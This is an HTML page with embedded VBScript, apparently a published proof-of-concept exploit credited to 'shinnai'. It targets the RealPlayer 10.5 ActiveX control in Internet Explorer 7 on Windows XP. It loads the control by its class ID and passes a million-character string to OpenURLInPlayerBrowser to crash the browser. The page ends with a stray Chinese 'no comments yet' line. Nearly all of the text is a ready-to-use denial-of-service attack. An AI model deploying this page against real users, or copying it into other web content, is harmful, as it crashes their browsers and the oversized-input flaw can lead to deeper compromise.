<!--
---------------------------------------------------------------------------
RealPlayer 10.5 ierpplug.dll Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->
<html>
<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
<script language='vbscript'>
argCount = 2
arg1="default"
arg2=String(1000000, "A")
RealPlayer.OpenURLInPlayerBrowser arg1 ,arg2
</script>
暂无评论